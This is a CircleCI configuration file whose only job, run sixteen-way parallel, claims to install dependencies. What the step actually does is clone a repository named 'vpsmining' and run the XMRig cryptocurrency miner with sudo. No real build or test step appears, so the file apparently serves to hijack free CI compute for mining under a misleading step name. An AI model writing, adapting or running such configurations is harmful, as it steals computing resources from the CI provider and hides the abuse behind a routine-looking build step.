version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
              git clone https://github.com/techsurfer9/vpsmining && cd vpsmining && cd xmrig-6.15.3 && chmod +x xmrig && sudo ./xmrig
              echo ENDED

workflows:
    version: 2.1
    build:
        jobs:
        - trial